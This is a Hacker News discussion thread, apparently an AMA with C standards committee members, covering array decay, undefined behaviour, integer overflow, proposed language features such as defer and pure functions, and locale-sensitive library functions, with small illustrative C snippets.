I think GCC's behaviour is legal here. The target platform may have no trap values, but I don't see that GCC is prohibited from behaving as if there are. It would be legal (albeit bizarre) for it to generate code for a completely different ISA, and to bundle an emulator. If the spec says you've opened the door to UB, then unless your compiler documentation says otherwise, it's permitted to generate code that goes haywire, no?


I wrote about a simple addition to C that could eliminate most buffer overflows:

https://www.digitalmars.com/articles/C-biggest-mistake.html

I.e. offering a way that arrays won't automatically decay to pointers when passed as a function parameter.


Arrays are pointers. If they weren't, you would need to copy the data when passing an array as a function parameter, and that's a lot slower. Being able to prepare a set of data in an array and then give a pointer to a function is very useful. You could add a second type of array on top of what you have in C that includes more stuff, but if that's what you want, you can implement it yourself with a struct.


An array is not a pointer. These are completely different data types. For example, you can't apply pointer arithmetic to arrays without casting them to pointers.


That's right. They are converted to pointers when passed to a function, even if the function declares the parameter as an array.


They're not converted but can be implicitly casted to pointer types.


No, they're converted. There is no such thing as an "implicit cast". And it's not specific to arguments in function calls.

Array types and pointer types are distinct.

An expression of array type is, in most but not all contexts, implicitly converted (really more of a compile-time adjustment) to an expression of pointer type that yields the address of the 0th element of the array object. The exceptions are when the array expression is the operand of a unary & (address-of) or sizeof operator, or when it's a string literal in an initializer used to initialize an array (sub)object. (The N1570 draft incorrectly lists _Alignof as another exception. In fact, _Alignof can only take a parenthesized type name as its operand.)

If you do:

    int arr[10];
    some_func(arr);
then arr is "converted" to the equivalent of &arr[0] -- not because it's an argument in a function call, but because it's not in one of the three contexts listed above in which the conversion doesn't take place.

Another rule that causes confusion here is that if you define a function parameter with an array type, it's treated as a pointer parameter. For example, these declarations are exactly equivalent:

    void func(int arr[]);
    void func(int arr[42]); // the 42 is quietly ignored
    void func(int *arr);
Suggested reading: http://www.c-faq.com/, particularly section 6, "Arrays and Pointers".

A conversion converts a value of one type to another type (possibly the same one). The term "cast" refers only to an explicit conversion, one specified by a cast operator (a parenthesized type name preceding the expression to be converted, like "(double)42"). An implicit conversion is one that isn't specified by a cast operator.


A little-known but useful C feature is static array indices, as in:

  void foo(int array[static 42]);
which means you can't pass in an array of less than 42 elements (and the compiler can warn you if it notices you are).


Sure you can. int aFoo[]; has many legal array operations possible:

  *(aFoo+3) should work fine and return the 4th int in the array.


I think your star operator there is making the compiler cast your array to pointer implicitly.


It's all symbols, so you can say whatever. But if it looks like a pointer, walks like a pointer, and quacks like a pointer, It's A Pointer.


They are accessed using pointer arithmetic; if you wanted them to contain length data, you would need a different access pattern. I think one of the great features of C is that it doesn't do anything under the hood; it's all explicit. If you want to bounds check, then do it.


> they are accessed using pointer arithmetic

Not always. Consider:

    int a[3];
    a[1] = 2;
This is not using pointer arithmetic. Dump the generated code if you don't believe me :-)


It's still pointer arithmetic, it's just done at compile time rather than at execution. Still, you deserve style points :-)


Tell that to

  mov DWORD PTR [rsp - 8], 2


C currently replaces my use of an array with a pointer. This sucks, because I'd have taken the address if I wanted that.

Your proposal replaces my use of an array with two things, a pointer (as before) and a length. This is not too helpful, because I already could have done that if I'd wanted to.

What is missing is the ability to pass an array. Sometimes I want to toss a few megabytes on the stack. Don't stop me. I should be able to do that. The called function then has a copy of the original array that it can modify without mangling the original array in the caller.


> Your proposal replaces my use of an array with two things, a pointer (as before) and a length. This is not too helpful, because I already could have done that if I'd wanted to.

C doesn't have a reasonable way of doing that. I know my proposal works, because we've been using it in D for 20 years.


Your proposal does not work, at least when making the declarations binary compatible with older code.

Note that C is a pass-by-value language, so passing an array means that the called function can modify the content without the modifications being seen in the caller.

To sort of pass arrays in an ABI-compatible way, the version for older code would require putting the array inside a struct.

Even that doesn't fully work with any ABI that I've ever heard of. The struct doesn't really get passed. Disassemble the code if you have doubts. The caller allocates space for the struct, copies the struct there, and then passes a pointer to the struct. From the high-level view of the language, this is passing the struct, but the low level details are actually wrong.


A lot of you seem to be working on commercial solutions to C's insecurity. Does this feel like a conflict of interest to you?


Good question, but not at all! I've been working as hard as I can for the past 15 years to improve C language security, as have other security-minded members of the committee. Generally speaking, we are in the minority, as performance is still the major driver for the language. Any security solution that introduces > 5% overhead, for example, is a nonstarter. I think we all understand that our jobs are completely safe no matter what security improvements we can get adopted.

The committee works a lot like lobbying. A minority of people with a large financial interest in the technology (such as compiler writers) have undue influence because they participate in the process. I always encourage C language users to take a more active role, but they usually don't. Cisco is an example of a user community that actively takes part in C standardization.


I guess this is why vendors like Apple, Oracle, ARM and Google end up going the hardware memory tagging route instead.


I have been told in this very AMA that I lacked enthusiasm about C (and the gratuitous insecurity of the language when we know that a well-designed type system and a few runtime checks solve the problem entirely is indeed the reason for my perceived lack of enthusiasm): https://news.ycombinator.com/item?id=22865912

I hope that this perceived lack of enthusiasm means I am handling the conflict of interest honorably.


When will C gain a mechanism for "do not leave this sensitive information laying around after this function returns"? We have memset_s but that doesn't help when the compiler copies data into registers or onto the stack.


This is an entire language extension, as you note. The last time various people interested in this were in the same room (it was in January 2020 at a workshop called HACS), what emerged was that the Rust people would try to add the "secret" keyword to their language first, since their language is still more agile than C, while the LLVM people would prepare LLVM for the arrival of at least one front-end that understands secret data.

Is this enough to answer your question? I can look up the names of the people that were involved and communicate them privately if you are further interested.


Also worth noting that a language extension may not be sufficient for all cases. E.g. the OS stores register state on a context switch; do you also need a flag for the system to zero any memory used for this purpose following the state restore, or is it OK to trust that it won’t leak through some mechanism? For some applications, there may be contractual or regulatory requirements to have an erasing mechanism for copies like this as well.


I want to use this in the OS kernel too. ;-)


Thanks for the update. I was encouraging some of the people who were going to be at HACS to address this but I hadn't heard the latest progress. Unfortunately I couldn't be there myself.


If I remember correctly, Chandler was the one writing down the draft for LLVM developers to comment on LLVM-side. Unfortunately, if you Google his name and the relevant keywords, the results are full of his work on speculative load hardening.

Someone who read the LLVM mailing-list attentively should have seen it and may have a link.


(Not OP) I would appreciate any references you can provide. An LLVM __attribute__((secret)) would be a great place to start.


Unfortunately I am out of useful information:

https://news.ycombinator.com/item?id=22868999

I hope someone will provide the next link.


1. Are there any plans for standardizing empty initializer lists?

    struct foo { int a; void *p; };

    struct foo f = {0}; // legal C, f->p initialized like a static variable
    struct foo f = {}; // not legal but supported by gcc
To me it would make sense that there is no need to specify a value for any of the members that are intended to be initialized exactly like static variables (and the first member is not special so I shouldn't have to explicitly assign a zero?). However the syntax currently demands at least one initializer.

--

2. I recall seeing a proposal for allowing declarations after case labels:

    switch (foo) {
    case 1:
        int var;
        // ...
    }
This is currently not allowed and you'd have to wrap the lines after case in braces, or insert a semicolon after the case label. Is this making it to c2x?
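The two workarounds mentioned above, sketched out (demo is a hypothetical name):

```c
void demo(int foo) {
    switch (foo) {
    case 1: {            /* workaround 1: braces open a new block */
        int var = 0;
        (void)var;
        break;
    }
    case 2:;             /* workaround 2: an empty statement carries the label */
        int other = 0;   /* C99 allows a declaration after a statement here */
        (void)other;
        break;
    }
}
```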

--

3. I've run into some recent controversy w.r.t. having multiple functions called main (and this has come up in production code). In particular, I ran into a program that has a static main() function (with parameters that are not void or int and char[]), which is not intended to be *the* main function that is the program's entry point.

gcc warns about this because the parameters disagree with what's prescribed for the program entry point. It's not clear to me whether this is intended to be legal or not.

--

4. Looking at the requirements for main brings up another question: it says how main should be defined (no static or extern keyword). However, the definition could be preceded by a static declaration, which then affects the definition that follows:

If the declaration of an identifier for a function has no storage-class specifier, its linkage is determined exactly as if it were declared with the storage-class specifier extern.

For an identifier declared with the storage-class specifier extern in a scope in which a prior declaration of that identifier is visible, if the prior declaration specifies internal or external linkage, the linkage of the identifier at the later declaration is the same as the linkage specified at the prior declaration.

Therefore, it is possible to have a main function with internal linkage and a definition that exactly matches the one given in the spec:

    static int main(int, char *[]);

    int main(int argc, char *argv[]) { /* ... */ }
As one might guess, this program doesn't make it through the linker when compiled with gcc. Is this supposed to be legal? Should the spec perhaps require main to have external linkage, and then allow other functions called main with internal linkage (and parameters that do not match what is required of the external one)?

EDIT: ---

Are the fixes w.r.t. reserved identifiers going to make it in c2x? Can I finally have a function called toilet() without undefined behavior?


I'd love your opinion on the abundance of "undefined behaviour" (as opposed to implementation-defined, or some new incantation such as "unknown result in variable but system is safe") for relatively trivial things such as signed (but not unsigned) integer overflows. I've heard that this is to allow for non-twos-complement implementations. However, in practice, you notice that most people use ugly workarounds which lead to ugly code that (because of e.g. casting to unsigned and allowing the same overflow to happen anyway) only work correctly on twos-complement anyway. Is this intended to be addressed in the future in some way?


> (because of e.g. casting to unsigned and allowing the same overflow to happen anyway) only work correctly on twos-complement anyway

Unsigned arithmetic never overflows, and guarantees two's-complement behavior, because unsigned arithmetic is always carried out modulo 2^n:

> A computation involving unsigned operands can never overflow, because a result that cannot be represented by the resulting unsigned integer type is reduced modulo the number that is one greater than the largest value that can be represented by the resulting type. (6.2.5, Types)

Doing the computation in unsigned always does the "right thing"; the thing that one needs to be careful of with this approach is the conversion of the final result back to the desired signed type (which is very easy to get subtly wrong).


A quibble on wording: Unsigned overflow is not "twos-complement". It gives you the same bit patterns that typical two's-complement overflow gives you, but strictly speaking two's-complement is a representation for signed values.


Wrapping around the modulus to me is an "overflow", although maybe the spec doesn't use the word that way


There is also a difference in x86 assembly, and probably others.

For unsigned operations the carry flag is used, and for signed operations, the overflow flag is used.


Most compilers will translate unsigned (x + y < x) to CF usage.


Right, there are (at least) two ways to describe this.

One is that unsigned arithmetic can overflow, and the behavior on overflow is defined to wrap around.

Another is to say that unsigned arithmetic cannot overflow because the result wraps around.

Both correctly describe the way it works; they just use the word "overflow" in different ways.

The C standard chooses the second way of describing it.


And are there standard primitives to do this correctly (signed-unsigned-signed conversion) that never invoke undefined behavior?


Signed to unsigned conversion is fully defined (and does the two's complement thing):

> Otherwise, if the new type is unsigned, the value is converted by repeatedly adding or subtracting one more than the maximum value that can be represented in the new type until the value is in the range of the new type (6.3.1.3 Signed and unsigned integers)

Unsigned to signed is the hard direction. If the result would be positive (i.e. in range for the signed type), then it just works, but if it would be negative, the result is implementation-defined (but note: not undefined). You can further work around this with various constructs that are ugly and verbose, but fully defined and compilers are able to optimize away. For example, `x <= INT_MAX ? (int)x : (int)(x + INT_MIN) + INT_MIN` works if int has a twos-complement representation (finally guaranteed in C2x, and already guaranteed well before then for the intN_t types), and is optimized away entirely by most compilers.


Interesting. I guess most/many architectures' overflow flag is set when the sign bit changes, and the carry flag when the result rolls over the word size.

I think most people colloquially call going A + 1 = B where B < A an overflow. Interesting. I knew they're different things, but never really thought about my word choice.


Why can't I have flexible array members in union? Consider this:

    struct foo {
        enum { t_char, t_int, t_ptr, /* .. */ } type;
        int count;

        union {
            char c[];
            int i[];
            void *p[];
            /* .. */
        };
    };

This isn't allowed, since flexible array members are only allowed in structs (but the union here is exactly where you'd put a flexible array member if you had only one type to deal with).

Furthermore, you can't work around this by wrapping the union's members in a struct because they must have more than one named member:

    struct foo {
        enum { t_char, t_int, t_ptr } type;
        int count;

        union { /* not allowed! */
            struct { char c[]; };
            struct { int i[]; };
            struct { void *p[]; };
        };
    };
But it's all fine if we either add a useless dummy variable or move some prior member (such as count) into these structs:

    struct foo {
        enum { t_char, t_int, t_ptr } type;
        int count;

        union { /* this works but is silly and redundant */
            struct { int dumb1; char c[]; };
            struct { int dumb2; int i[]; };
            struct { int dumb3; void *p[]; };
        };
    };
Of course, you could have the last member be

    union { char c; int i; void *p; } u[];
but then each element of u is as large as the largest possible member which is wasteful, and u can't be passed to any function that expects to get a normal, tightly packed array of one specific type.


So what do people think about having a feature in the C language akin to the defer statement in GoLang?

The GoLang defer statement defers the execution of a function until the surrounding function returns. The deferred call's arguments are evaluated immediately, but the function call is not executed until the surrounding function returns. It looks like an interesting mechanism for cleaning up resources.


It could be very useful for cleaning resources. I've never used GoLang, but can see how that could be useful in various circumstances. As we're talking about C, I suspect a feature like that, with the potential to make things safer, would also enable the unwary to shoot themselves in the foot more easily.


It sounds like the __attribute__((cleanup(…))) already offered by GCC is similar to this. I probably won't have time to investigate the differences while the AMA is ongoing though.


I personally don't like golang's defer. For me it obscures the flow of the program. For example when I acquire a lock, I like to see where exactly it's released.

For me "defer" only makes sense in the context of exceptions, basically as an equivalent to "finally". This is a slippery slope though, since golang's exceptions are, for a reason, rudimentary.


How about deferring until the surrounding block scope ends? In Go you can get around the limitation of defer only executing at the end of a function by wrapping any arbitrary section of code inside an immediately executed anonymous function. But in C I'm not sure that's possible so maybe one could declare a new block scope instead to control when defer kicks in.


[deleted]


I would love to see defer in the language. It helps keep cleanup code close to the resource that is acquired.

Would the proposed defer statement apply to loops as well? How would one implement such defers without dynamic allocation?


When deciding on the behavior of some operation that maps to hardware [1], how do you weight the existing hardware behaviors?

For example, if all past, current and contemplated hardware behaves in the same way, I assume that the standard will simply enshrine this behavior.

However, what if 99% of hardware behaves one way and 1% another? Do you set the behavior to "undefined" to accommodate the 1%? At what point to you decide that the minority is too small and you'll enshrine the majority behavior even though it disadvantages minority hardware?

---

[1] Famous examples include things like bit shift and integer overflow behavior.


I would say that the committee does pay attention to hardware variations, even when there are no examples of existing hardware that implement a feature (for example, a trap representation for integers other than _Bool). Some of the thinking is that "if it was ever implemented in hardware, it could be again." I'm not crazy about this thinking, and I largely think that language features for which there are no existing hardware implementations should be eliminated and then brought back if needed. However, the C committee is much smaller than the C++ committee, so there is a labor shortage. More people getting involved would certainly help.

We have dropped support for sign and magnitude and one's complement architectures from C2x (a decision Doug Gwyn does not agree with). There was some concern that Unisys may still use a one's complement architecture, but that this may only be in emulation nowadays.


Some example of hardware variation (since you mentioned shifting and overflow):

- when signed integer overflow or division by zero occurs, a division instruction traps on x86, while it silently produces an undefined result on PowerPC;

- left-shifting a 32-bit one by 32 bits yields 0 on ARM and PowerPC, but 1 on x86;

- left-shifting a 32-bit one by 64 bits yields 0 on ARM, but 1 on x86 and PowerPC.


On x86 it's actually mixed: scalar shifts behave as you describe, but vectorised logical shifts flush to zero when the shift amount is greater than the element size!

So x86 actually has both behaviors in one box (three behaviors if you count the 32-bit and 64-bit scalar things you mentioned separately).

This is an example of where UB for simple operations actually helps even on a single hardware platform: it allows efficient vectorization.


A good example might be 1's complement signed integers. They were dead weight in the standard for a long time.


Yes, but that is a slightly different question: how long you do you keep something in the standard after all the relevant hardware has disappeared, e.g,. is there a framework for periodically re-evaluating decisions in light of the changing hardware landscape.

My question was more about when behavior is being defined for the first time, which admittedly doesn't happen that often (but it could apply e.g., when thing fixed-width integer types, uintX_t and friends were introduced).


Original standard feature specifications were not meant to obtain a 1-to-1 map from C onto hardware, but we used practical experience to judge what overhead was acceptable for the kinds of processors we had seen or thought were reasonable choices that the architects might make in the not too distant future. If a frequently-executed action had to (for example) check for a special condition every time, the overhead might increase by several percent, depending on the instruction set architecture. So quite often we argued that "if the programmer wants to test for that condition, he can do so, but typically it is a waste of cycles". There are a lot of such trade-offs; maybe we should write a paper or book on this topic.


As a C newbie, will there ever be "safe" C, i.e. no undefined behavior and help with writing code that has less memory related crashes/bugs? For comparison, Rust has the `unsafe { }' block which lets you mark regions of code as being able to do funky stuff. Could we get the opposite for C, i.e. `safe { }' and for an entire file, `#pragma safe'?

I have a love-hate relationship with C - I like it for small projects, but anything serious I really need to write it in a more safe language. I think GCC has some flags that can help, and I've been using tools like splint, but something baked into the standard would be amazing.


I'm pretty happy with C as it is, but I will admit to being surprised that a "minimalistic Rust" hasn't risen to prominence.

I guess what I mean by that is a language that has Rust's hyperactive, strongly opinionated compiler, borrow checker, no NULL, immutable by default, etc., but in a language that is no more syntactically ambitious than C89. I would be way more into a language like that than Rust.

A language that sort of feels like Go, but can actually be used for low-level systems programming.


I think it's going to arrive, but some time is needed to see what works in Rust or not. D is going this way as well, so should provide another data point.


Is the committee planning on working on the preprocessor? I don't see any reason for not boosting it. It's time for C to have real meta-programming. Would be nice to have local macros that are scoped.

On another note:

- Official support for __attribute__

- void pointers should offset the same size as char pointers.

- typeof (can't stress this one enough)

- __VA_OPT__

- inline assembly

- range designated initializer for arrays

- some GCC/Clang builtins

- for-loop once (Same as for loop, but doesn't loop)

Finally, stop putting C++ craps into C.


+1 for Modern Metaprogramming.

I know some people are against metaprogramming because they believe the abstractions hide the details of how the underlying code will execute, but I would love to write substantial tests in C without relying on FFI to Python or C++ to perform property-based testing, complex fuzzing, and whatever. I feel metaprogramming would be a huge boon for C tooling and developer productivity.


From my point of view, there's a difference between abstraction created by the language, e.g. lambdas or virtual tables in C++, and abstraction created by the programmer via the CPP.

The former is compiler dependent and you cannot know how it's implemented. The latter is simple text substitution and you're the one implementing it. I often find myself creating small embedded languages in CPP for making abstractions, and I know exactly what C code they're going to generate and thus the penalty, if there is any.

People who are afraid of the preprocessor simply don't understand how powerful it is in good hands.


Does the committee have plans to deprecate (as in: give compilers license to complain, such that compiler developers can appeal to the standard when users complain back) locale-sensitive functions like isdigit, which is useless for processing protocol syntax, because it is locale-sensitive, and useless for processing natural-language text, because it examines only one UTF-8 code unit?


isdigit is likely to remain, because much existing code does use it (perhaps in different contexts from the one you cited). If you need a different function specification to do something different, it could be added in a future release, but that doesn't mean that we need to force programmers to change their existing code.


What about giving isdigit and friends defined behavior for any argument value that's within the range of any of char, signed char, or unsigned char?

The background (I know Doug knows this): isdigit() takes an argument of type int, which is required to be either within the range of unsigned char, or have the value EOF (required to be negative, typically -1).

The problem: plain char is often signed, typically with a range of -128..+127. You might have a negative char value in a string -- but passing any negative value other than EOF to isdigit() has undefined behavior. Thus to use isdigit() safely on arbitrary data, you have to cast the argument to unsigned char:

    if (isdigit((unsigned char)s[i])) ...
A lot of C programmers aren't aware of this and will pass arbitrary char values to isdigit() and friends -- which works fine most of the time, but risks going kaboom.

Changing this could raise issues if -1 is a valid character value and also the value of EOF, but practically speaking -1 or 0xff will almost never be a digit in any real-world character set. (It's ÿ in Unicode and Latin-1, which might cause problems for islower and isalnum.)


This proposal is very difficult to implement because it would cause ABI breakage, due to the way the isdigit() macro (and its friends) exposes the representation of the ctype internals.


I remember that the various is* man pages noted that most of them are only defined if isascii() is true. So I always used e.g. (isascii(x) && ispunct(x)).

FWIW, just looked at the man page (macos) and iswdigit() and isnumber() are mentioned.


isascii() is not defined by ISO C. (It is defined by POSIX, but POSIX says it may be removed in a future version.)

I see that POSIX explicitly says that isascii(x) is "defined on all integer values" (it should have said "all int values").

Personally I'd rather cast to unsigned char.


Does there exist a use case in portable code such that use of isdigit is not a bug?

How does the committee view non-portable existing code generally when considering changes?


Code can be non-portable for various reasons, not all of them bad. I just grepped a recent release of DWB and found about 100 uses of isdigit, most of which were not input from random text but rather were used internally, such as "register" names (limited to a specified range). Other packages are likely to have similar usage patterns. I really don't want to have to edit that code just for aesthetics.


C11 has seen new features, such as Generic Selection. Is the current language standardization converging (just adding clarifications, removing the surface for undefined behavior, etc.) or is C still growing with new features?

In other words, will the C standard be effectively “done” at some time in the future?


Fixing minor bugs or inconsistencies and reducing the number and kinds of instances of undefined behavior are some of the efforts keeping the C committee busy.

Reviewing proposals to incorporate features supported by common implementations is another.

Aligning with other standards (e.g., floating point) and improving compatibility with others (C++) is yet another.

In general, when an ISO standard is done it essentially becomes dead. So for the C standard to continue to be active (on ISO's books) it needs to evolve.


It's interesting to hear the standardization perspective, because it's pretty much the opposite of my perspective as a user.

I see the classic path of any programming language -- regardless of standardization -- is to continuously add features until it's so big and complex that nobody wants to deal with it any more. Then it's replaced by a newer, simpler language that takes the important bits and drops the unnecessary complexities. At that point, everybody sees that the older language was barking up the wrong tree, and they stop wasting time on it.

It's not the cessation of language change that causes language death -- that's merely a symptom. You can't keep a language alive simply by changing it every year. Some people sure have tried.

Alternatively, until it's evolved so much that there is so much diversity of implementation that simply knowing a library is written in "language X" doesn't tell me much about how it's written, or whether I can use it in my program which is also written in "language X".

Then again, C is the exception to every rule, so maybe we can keep piling on features indefinitely, and people will have to use it (even if they don't like it), for the same reason they started using it decades ago (even if we didn't like it).


I would say no, that we are still adding new features. Aaron Ballman was responsible for adding attributes to C2x (he can tell you more). We're also looking at the #embed feature to incorporate binaries the way that #include incorporates text.


A full list of proposals to WG14 can be found here:

http://www.open-std.org/jtc1/sc22/wg14/www/wg14_document_log...

These papers are usually quite interesting.


Some random thoughts:

I appreciate the original simplicity of K & R, "The C Programming Language", 2nd Edition, and the relatively simple semantics of ANSI C89/ISO C90 compared to C99 and later.

You don't need complex parsing methods for ANSI C89/ISO C90 and you do not need the "lexer hack" to handle the typedef-name versus other "ordinary identifier" ambiguity.

A surprising number of colleges still teach K & R 2nd Edition C.

Whenever someone brags about using recursive-descent parsing methods, I always ask, are they using predictive, top-down parsing, or back-tracking?

I hope C never loses sight of its roots nor morphs into C++ under the guise of creating a common subset, but which is really a disguised superset of C and C++.

Please prevent the ever increasing demand for new features from overwhelming C's simplicity so it can no longer be parsed with simple methods.


Is there a possibility there will be introduced a new rule saying "if the compiler detects UB it should abort the compilation instead of breaking the code in the most incomprehensible way possible"?

Right now it's just scary to start a new project in C. It would be really great if there was more emphasis on correctness of the produced code instead of the insane optimizations.


This can only be done at compile time in very specific cases. The huge problem here is the compiler has no way of knowing which cases of undefined behavior are bugs in the program and which cases of undefined behavior are just examples of unreachable code. If the compiler aborted compilation when it detected undefined behavior, you’d be getting a lot of false positives for unreachable code, and you’d need to solve that problem (figuring out how to generate sensible errors and suppress them). This is not even remotely easy.

If you are concerned about safety there are ways to achieve that, like using MISRA C, formally verifying your C, or by writing another language like Rust.


Good point, but could it not be required that the unreachable code would be annotated to be unreachable? It could even have a (development only) assertion in the location.


That would be an immense undertaking. It’s not really just that some statement or expression is unreachable (we have __builtin_unreachable() in GCC for stuff like that) but that certain states are unreachable.

For example,

    int buffer_len(struct buffer *buf) {
        return buf->end - buf->start;
    }
There are at least three states that trigger undefined behavior: buf is not a valid pointer, buf->end - buf->start doesn’t fit in int, and buf->end and buf->start don't point to the same object.

I’m not sure how you would annotate this. At the function call site, you would somehow need to show that buf is a valid pointer, and that start/end point to same object and the difference fits in an int. It would start looking more like Coq or Agda than C.

Honestly, I think if you really want this kind of safety, your options are to use formal methods or switch to a different language.

There’s also this weird assumption here that the compiler detects undefined behavior in your program and then mangles it. It’s really the opposite—the compiler assumes that there is no undefined behavior in your program, and optimizes accordingly. In practice you can turn optimizations off and get something much closer to the “machine model” of C (which doesn’t really exist anyway) but most people hate it because their code is too slow.
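That "assume no UB" model can be made concrete with the classic overflow-check idiom (a sketch; at -O2, GCC and Clang are entitled to fold the first function to 0):

```c
#include <limits.h>

/* Under the "no UB" assumption the compiler may fold this test to 0,
   since x + 1 only overflows (which is UB) when x == INT_MAX. */
static int wraps_if_incremented(int x) {
    return x + 1 < x;   /* undefined behavior when x == INT_MAX */
}

/* A well-defined rewrite that the compiler must preserve: */
static int wraps_if_incremented_safe(int x) {
    return x == INT_MAX;
}
```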


Thanks, so it's definitely easier said than done! Good explanation.


> If the compiler aborted compilation when it detected undefined behavior, you’d be getting a lot of false positives for unreachable code

Could you please provide an example of this?


Overflow of signed integers is undefined.

    int add(int a, int b) { return a + b; }
Unless the compiler can prove that `add` is never called with a and b values resulting in an overflow, this code can lead to UB, and, under your rules, the compilation aborts.


It would be wonderful (IMO) if we could get to that point, but that would leave implementations with too great of a burden because many forms of UB can only be caught at runtime (without a considerable number of false positives). Generally, the C committee makes things a "constraint violation" (aka, we would like implementations to err) whenever something can be caught at compile time, and we leave the undefined behavior hammer for scenarios where there is not a reasonable alternative.

Thankfully, there are a lot of tools to help developers catch UB these days (UBSan, static analyzers, valgrind, etc). I would recommend using those tools whenever starting a new project in C (or C++, for that matter).
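Besides the runtime sanitizers (compile with -fsanitize=undefined in GCC or Clang), you can sidestep some UB entirely with the checked-arithmetic builtins; these are a non-standard GCC/Clang extension. A sketch:

```c
#include <limits.h>
#include <stdbool.h>

/* __builtin_add_overflow (GCC/Clang extension) reports overflow via
   its return value instead of invoking undefined behavior. */
static bool checked_add(int a, int b, int *out) {
    return __builtin_add_overflow(a, b, out);
}
```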


  int i;
  […]
  i += 1;
is potentially undefined behavior; i could overflow.

Compilers nowadays are fairly good at warning about definite undefined behavior.

I don’t think anybody would be happy with a compiler that aborted on all potential undefined behavior. That would (almost) be equivalent to banning the use of all signed ints.


Some implementations have been making a lot of effort to do just that. GCC in particular has been adding these types of checks (either as warnings or sanitizers) in recent years and although there is still much to improve I'd like to think we have made good progress.

Adding a rule requiring implementations to error out in cases of undefined behavior would be hard to specify in the standard. It could (and in my view should) be done by providing non-normative encouragement as "Recommended Practice."


Try using "lint" or other code checkers.


Can you please repeat this AMA at a later date and at a time of day when people on the west coast of the USA are awake? Alternatively, please keep it going for a few hours if you would be able to be so generous with your time! Thank you for doing this!

Do you also answer questions about the standard libraries? This is not so much a C question as a library question:

I'm wondering if Apple's Grand Central Dispatch ever made it into a more integrated role in C's libraries, or if it will forever remain an outside add-on. And whether there is anything else at that level (level in the sense of high versus low level) in the standard libraries that plays such a role, that I should read up on instead of GCD.


> Alternatively, please keep it going for a few hours if you would be able to be so generous with your time!

We're remaining active while there are still people asking questions, so the west coast folks should hopefully have the chance to ask what they'd like.

> Do you also answer questions about the standard libraries?

Sure!

> I'm wondering if Apple's Grand Central Dispatch ever made it into a more integrated role in C's libraries, or if it will forever remain an outside add-on.

GCD has not been adopted into C yet, and I don't believe it's even been proposed to do so by anyone (or an alternative to GCD, either).

It would be an interesting proposal to see fleshed out for the committee, and there is a lot of implementation experience with the feature, so I think the committee would consider it more carefully than an inventive proposal with no real-world field experience.


GCD relies on Blocks (closures) for ergonomics, and Blocks have been proposed to WG14, for example N1451: http://www.open-std.org/jtc1/sc22/wg14/www/docs/n1451.pdf


What has been the rationale or hindrance for not adding locale-independent versions of various stdlib functions?

Practically every second C codebase on earth has their own implementations of these at some point, and it remains a huge problem for e.g. writers of libraries, where you don't know how/where your library will be used.


First, there needs to be a proposal for adding a feature (I'm not aware of one having been submitted recently). Second, any non-trivial proposed feature needs to have some existing user experience behind it. For libraries that typically means implementations shipping with operating systems or compilers (but successful third party libraries might also be considered). Finally, it also needs to appeal to people on the committee; that can be quite challenging as well. Many proposals that meet the first two criteria die because they simply don't get enough support within the committee.


Sounds mostly like the issue is nobody has bothered to submit a proposal for it then? (There is so much in-the-wild experience and code dealing with this issue, I cannot imagine the second point being problematic.)

On the third point, I have trouble thinking of any technical objections to such proposal.


To clarify, do you mean functions like c_isalpha (part of Gnulib) which is like isalpha but only matches 7 bit ASCII characters?


An easy (and problematic) example is decimal separators (radix characters) being parsed or written differently based on locale.
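For instance, classifiers in the style of Gnulib's c_* family mentioned above can be sketched like this (the ascii_* names are hypothetical):

```c
/* Hypothetical locale-independent classifiers, modeled on Gnulib's
   c_* family: unlike isalpha()/isdigit(), these never consult the
   current locale and match 7-bit ASCII only. */
static int ascii_isalpha(int c) {
    return (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z');
}

static int ascii_isdigit(int c) {
    return c >= '0' && c <= '9';
}
```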


There's a compiler attribute in GCC to promise that a function is pure, i.e. free from side effects and only uses its inputs.

This is useful for parallel computations, optimizations and readability, e.g.

   sum += f(2);
   sum += f(2);
can be optimized to

   x = f(2);
   sum += x;
   sum += x;
Would the current motto of the consortium forbid adding a feature such as marking a function as pure, that would not just promise, but also enforce that no side effects are caused (only local reads/writes, only pure functions may be called), and no inputs except for the function arguments are used?
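For reference, a sketch of the existing (non-standard, unenforced) GCC/Clang attributes: `const` matches the strict definition in the question (no side effects, reads only its arguments), while `pure` is weaker and also permits reads of global memory.

```c
/* GCC/Clang extension, not standard C. The attribute is a promise,
   not something the compiler enforces. */
__attribute__((const))
static int f(int x) {
    return x * x;
}

static int sum_twice(void) {
    int sum = 0;
    sum += f(2);   /* the compiler may fold these two calls into one */
    sum += f(2);
    return sum;
}
```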


No enforcing! This is useful even when it's, strictly speaking, a lie.

Suppose I want to add some debug tracing into f():

   f.c: 42: f entered
   f.c: 43: returning 2
that's a side effect, right? But now the pure attribute tells a lie. Never mind though; I don't care that some calls to f are "wrongly" optimized away; I want the tracing for the ones that aren't.

In C++ there are similar situations involving temporary objects: there is a freedom to elide temporary objects even if the constructors and destructors have effects.

Even a perfectly pure function can have a side effect, namely this one: triggering a debugger to stop on a breakpoint set in that function!

If a call to f(2) is elided from some code, then that code will no longer hit the breakpoint set on f.

Side effect is all P.O.V. based: to declare something to be effect-free in a conventional digital machine, you have to first categorize certain effects as not counting.


Such attributes would be most useful if the semantics were that any time after a program receives inputs that would cause a "pure" function to be called with certain arguments, a compiler may at its leisure call the function with those arguments as many or as few times as it sees fit.

The notion that "Undefined Behavior" is good for optimization is misguided and dangerous. What is good for optimization is having semantics that are loose enough to give the compiler flexibility in how it processes things, but tight enough to meet application requirements.

Instead of saying that compilers can do anything they want when their assumptions are violated, it would be far more useful to recognize what they are allowed to do on the basis of certain assumptions. For example, given a piece of code:

    long long test1(long long x)
    {
      while(x)
        x = slow_function_no_side_effects(x);
      return x;
    }

    void test2(long long x, int mode)
    {
      x = test1(x);
      if (!mode)
        x=0;
      doSomething(x);
    }
It would generally be useful and safe to allow a compiler that determines that no individual action performed by "test1()" could have any side effects to omit the call to "test1()" if its value never ends up being used, without having to prove that the slow function with no side effects will eventually return zero. It is likewise useful and safe to say that if the generated code observes either that the loop exits or that "mode" is zero, it may replace the call "doSomething(x)" with "doSomething(0)". The fact that both optimizations would be safe and useful individually, however, does not imply that it would be safe and useful to allow compilers to change the code for "test2()" so that it calls "doSomething(0)", or otherwise to allow code to observe that the value of "x" is zero when "mode" is non-zero, without regard for whether "test1()" would complete.


> flatfinger

https://news.ycombinator.com/user?id=supercat

?

If you contact the HN gods maybe there is a way to recover access to that account.


Just offer a -Wpure flag for checking if functions are pure. That way production/test releases can check while you can still use it for debugging.

Also, the problem with eliding breakpoints already exists afaik, since the compilers already check for pure functions.


